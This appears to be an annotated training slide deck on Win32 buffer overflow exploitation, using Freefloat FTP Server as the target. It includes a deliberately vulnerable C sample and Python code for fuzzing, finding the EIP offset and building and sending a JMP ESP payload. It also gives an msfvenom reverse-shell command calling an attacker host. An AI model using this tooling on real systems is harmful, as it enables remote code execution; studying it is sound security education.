
Exploit Development


  1. Exploit Development: Win32 Buffer Overflow Exploitation, by Kyaw Thiha
  2. Whoami? • Info-sec analyst • Currently working at Kernellix • Ex-team member of mmCERT • Participates in some bug bounty programs
  3. Prerequisite knowledge • The memory stack • CPU registers • Assembly language • Buffer overflow attacks • Understanding shellcode
  4. CPU registers: general-purpose registers EAX, EBX, ECX, EDX; segment registers CS, DS, SS, ES, FS, GS
  5. CPU registers: index and pointer registers EDI, ESI, EBP, ESP, EIP; the EFLAGS register
  6. General-purpose registers • EAX, accumulator register: used for I/O port access, arithmetic, interrupt calls, etc. • EBX, base register: used as a base pointer for memory access; gets some interrupt return values • ECX, counter register: used as a loop counter and for shifts; gets some interrupt values • EDX, data register: used for I/O port access, arithmetic, some interrupt calls
  7. Segment registers • CS holds the code segment in which your program runs; changing its value might make the computer hang • DS holds the data segment that your program accesses; changing its value might give erroneous data • SS holds the stack segment your program uses, sometimes with the same value as DS; changing its value can give unpredictable results, mostly data related • ES, FS, GS are extra segment registers available for far-pointer addressing, such as video memory
  8. Index and pointer registers • EDI, ESI: data (index) pointer registers for memory operations (destination and source index) • ESP: stack pointer register, the current top of the stack • EBP: stack base pointer register, the base of the current stack frame • EIP: instruction pointer, the address of the next instruction to execute
  9. EFLAGS register (bits not listed are reserved by Intel)
     Bit    Label  Description
     -----  -----  -------------------------------
     0      CF     Carry flag
     2      PF     Parity flag
     4      AF     Auxiliary carry flag
     6      ZF     Zero flag
     7      SF     Sign flag
     8      TF     Trap flag
     9      IF     Interrupt enable flag
     10     DF     Direction flag
     11     OF     Overflow flag
     12-13  IOPL   I/O privilege level
     14     NT     Nested task flag
     16     RF     Resume flag
     17     VM     Virtual 8086 mode flag
     18     AC     Alignment check flag (486+)
     19     VIF    Virtual interrupt flag
     20     VIP    Virtual interrupt pending flag
     21     ID     ID flag
  10. General-purpose register sub-registers (figure): EAX is the full 32-bit register (bits 31-0); AX is its low 16 bits (bits 15-0), which split into AH (bits 15-8) and AL (bits 7-0)
  11. Program memory layout (figure, from high address 0xffffffff down to 0x80961025): Stack (used for storing function call data) • Unused memory • Heap (dynamic memory) • .bss (uninitialized data) • .data (initialized data) • .text (program code)
  12. What is a buffer overflow? A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area past a buffer.
  13. What is a buffer overflow? Environments affected: almost all known web servers, application servers, and web application environments are susceptible to buffer overflows. The notable exception is environments written in memory-safe interpreted or managed languages such as Java or Python: the application code itself is not subject to these attacks, but the interpreter or runtime and any native extensions it loads still are.
  14. Stack layout (figure): from high to low memory the frame holds the saved return address (EIP), the saved EBP, saved registers such as EBX and EAX, and below them the local data buffers; program instructions live elsewhere. A buffer is filled from its low address upward, i.e. toward the saved EBP and EIP.
  15. Sample stack overflow (figure): the same frame after an over-long input of 'A' bytes. The buffer, the saved EBP and the saved EIP are all overwritten with 0x41414141 ("AAAA"), so the function returns to address 0x41414141 and the program crashes.
  16. Vulnerable code samples • Arrays: int a[20]; int a[20][5]; int a[20][5][3]; • Format strings: printf(), fprintf(), sprintf() • Overflow-prone copies: strcpy(), strcat(), sprintf(), vsprintf(), scanf()
  17. Sample program (deliberately vulnerable: gets() has no length limit, so any input line longer than 7 characters runs past buffer into the saved EBP and EIP above it)

      #include <stdio.h>

      void GetInput(void)
      {
          char buffer[8];
          gets(buffer);  /* no bounds check: input longer than 7 bytes overflows buffer */
          puts(buffer);
      }

      int main(void) { GetInput(); return 0; }
  18. Sample program (slide contains no text)
  19. Demo prerequisites • Freefloat FTP Server (the vulnerable target) • A debugger • Python • Metasploit
  20. Fuzzing, the very first step • Find the crash point: the input length at which the target dies • Find the vulnerable command: which FTP command mishandles its argument
  21. Fuzzing frameworks • Spike • Sulley • Peach
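The fuzzing step above in working form, as an added example that is not part of the deck and not Freefloat FTP's or any framework's code: the loop sends one FTP command with an ever-longer argument until the connection dies, which is the crash point, and a different command that never dies is not the vulnerable one. The transport is injected so the same loop runs against a real socket or against the fake server defined here; the fake server, its crash threshold of 1000 bytes, the lab address in the comment and the 100-byte step are all constructed for this example.

```python
import socket


def fuzz_command(connect, command=b"USER", start=100, step=100, limit=3000, filler=b"A"):
    """Send `command` with a growing argument until the target stops answering.

    Returns the first argument length in the tried sequence at which the
    connection dies (the crash point), or None if every length up to `limit`
    was accepted, in which case this command is probably not the vulnerable one.

    `connect` is a zero-argument callable returning a fresh connection object
    with recv()/send()/close(); injecting it lets the loop run against a real
    socket or against FakeFtpServer below.
    """
    length = start
    while length <= limit:
        try:
            conn = connect()
            conn.recv(1024)                                   # 220 banner
            conn.send(command + b" " + filler * length + b"\r\n")
            conn.recv(1024)                                   # a dead server never answers
            conn.close()
        except OSError:
            # ConnectionResetError, ConnectionRefusedError and socket.timeout all derive from OSError
            return length
        length += step
    return None


def tcp_connector(host, port, timeout=3.0):
    """Real transport for the lab box; host and port are whatever the lab uses."""
    return lambda: socket.create_connection((host, port), timeout=timeout)


class FakeFtpServer:
    """Constructed stand-in for the FTP daemon: answers normally until the
    argument of USER exceeds `crash_at` bytes, then behaves like a dead process."""

    def __init__(self, crash_at):
        self.crash_at = crash_at
        self.crashed = False
        self.requests = []

    def recv(self, bufsize):
        if self.crashed:
            raise ConnectionResetError("server process is gone")
        return b"220 Fake FTP ready\r\n"

    def send(self, data):
        if self.crashed:
            raise ConnectionResetError("server process is gone")
        self.requests.append(data)
        cmd, _, arg = data.rstrip(b"\r\n").partition(b" ")
        if cmd == b"USER" and len(arg) > self.crash_at:
            self.crashed = True                               # the overflow kills the process
        return len(data)

    def close(self):
        pass


if __name__ == "__main__":
    server = FakeFtpServer(crash_at=1000)
    print("crash point:", fuzz_command(lambda: server))      # 1100 against the fake server
    # Against a real target (constructed lab address): fuzz_command(tcp_connector("192.168.56.101", 21))
```

Run the real target under the debugger while fuzzing: the length returned here is only the first step size that crashed, so the exact overwrite offset still has to be pinned down with a cyclic pattern in the next step.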
  22. Overwrite EIP (slide contains no text)
  23. Know the crash point (slide contains no text)
  24. Know the crash point, continued (slide contains no text)
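How the crash point is turned into an exact EIP offset, as an added example that is not the deck's or Metasploit's code: it re-implements in plain Python the idea behind Metasploit's pattern_create.rb and pattern_offset.rb. Instead of "A" bytes, the fuzzer sends a pattern in which every 4-byte window of the full 20280-byte alphabet is unique, so the dword the debugger shows in EIP after the crash identifies where in the buffer the saved return address sits. The crash is simulated here and the offset 230 is a constructed value, not a measurement against Freefloat FTP.

```python
import string
import struct


def pattern_create(length):
    """Build the 'Aa0Aa1Aa2...' pattern used by Metasploit's pattern_create.rb.

    Triplets are upper-lower-digit, so within the full 26*26*10*3 = 20280 bytes
    every 4-byte window is unique and a single dword pins the offset.
    """
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern, eip):
    """Offset of the dword now in EIP (an int such as 0x41316141) inside the pattern.

    x86 is little-endian, so EIP 0x41316141 means the bytes 'A','a','1','A'
    were stored in memory in that order; pack the value the same way and search.
    """
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def simulate_crash(buf, eip_offset):
    """Constructed model of the crash: the 4 bytes of the input that land on the
    saved return address are what the debugger reports as EIP after the ret."""
    return struct.unpack("<I", buf[eip_offset:eip_offset + 4])[0]


if __name__ == "__main__":
    pattern = pattern_create(1100)          # a bit longer than the fuzzing crash length
    eip = simulate_crash(pattern, 230)      # in the real run this comes from the debugger
    print("EIP = 0x%08x -> offset %d" % (eip, pattern_offset(pattern, eip)))   # offset 230
```

With Metasploit the same two steps are `pattern_create.rb -l 1100` to generate the buffer and `pattern_offset.rb -q 41316141` (the EIP value as shown by the debugger) to recover the offset; send the pattern as the argument of the vulnerable command exactly as the fuzzer did, then read EIP in the debugger.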
  25. Program stack (figure): the payload is laid out as [buffer filler][EIP, overwritten with the address of a JMP ESP instruction][NOP sled][shellcode]. After the function returns, ESP points at the bytes just past the overwritten EIP, i.e. at the NOP sled, so the JMP ESP lands in the NOPs and execution slides into the shellcode.
  26. Control EIP (slide contains no text)
  27. Shellcode generation (slide contains no text)
  28. Final payload (slide contains no text)
  29. Final payload, continued (slide contains no text)
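The final payload assembled from the layout on slide 25, as an added example that is not the deck's code: filler up to the EIP offset, the JMP ESP address written little-endian over the saved EIP, a NOP sled, then the shellcode, with a check that no byte the FTP server treats as a line terminator ends up in the buffer. The offset 230, the JMP ESP address 0xDEADBEEF, the INT3 stand-in shellcode and the lab address are constructed placeholders; in a real run the offset comes from the pattern step, the address is that of an FF E4 (JMP ESP) instruction in a loaded module found in the debugger, and the shellcode comes from Metasploit, e.g. `msfvenom -p windows/shell_reverse_tcp LHOST=<attacker> LPORT=<port> -b '\x00\x0a\x0d' -f python`.

```python
import socket
import struct

BAD_CHARS = b"\x00\x0a\x0d"   # NUL, LF and CR end an FTP command line, so they must not appear in the payload

# Constructed placeholders, not measured values:
OFFSET = 230                  # bytes before the saved EIP, from the pattern step
JMP_ESP = 0xDEADBEEF          # address of an FF E4 (JMP ESP) in a loaded module, found in the debugger
SHELLCODE = b"\xcc" * 8       # stand-in for msfvenom output: INT3s, so the debugger stops on success


def check_bad_chars(data, bad=BAD_CHARS):
    """Return the set of forbidden byte values present in data (empty means clean)."""
    return {b for b in bad if b in data}


def build_payload(offset, jmp_esp, shellcode, nops=16, filler=b"A", bad=BAD_CHARS):
    """Lay out the buffer exactly as the slide's diagram:

        [filler * offset][saved EIP := JMP ESP address][NOP sled][shellcode]

    When the vulnerable function returns, the CPU pops the overwritten EIP and
    ESP is left pointing at the bytes right after it, i.e. the NOP sled; the
    JMP ESP lands there and execution slides down into the shellcode.
    """
    ret = struct.pack("<I", jmp_esp)            # little-endian, as the x86 stack stores it
    payload = filler * offset + ret + b"\x90" * nops + shellcode
    found = check_bad_chars(payload, bad)
    if found:
        raise ValueError("payload contains bad chars: %s" % sorted(hex(b) for b in found))
    return payload


def frame_after_overflow(payload, offset):
    """Constructed model of the smashed frame: (value loaded into EIP, bytes at ESP after the ret)."""
    eip = struct.unpack("<I", payload[offset:offset + 4])[0]
    return eip, payload[offset + 4:]


def send_exploit(host, port, payload, command=b"USER", timeout=3.0):
    """Deliver the payload as the argument of the vulnerable command."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)                            # banner
        s.send(command + b" " + payload + b"\r\n")


if __name__ == "__main__":
    p = build_payload(OFFSET, JMP_ESP, SHELLCODE)
    eip, at_esp = frame_after_overflow(p, OFFSET)
    print("EIP = 0x%08x, ESP -> %s..." % (eip, at_esp[:4].hex()))   # EIP = 0xdeadbeef, ESP -> 90909090
    # send_exploit("192.168.56.101", 21, p)   # constructed lab address
```

The bad-character list above is the minimum for an FTP command; the usual check is to send the bytes 0x01 to 0xff after the offset, compare what the debugger shows on the stack with what was sent, add every mangled byte to the `-b` list, and regenerate the shellcode until the two match.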
  30. Thanks! Questions?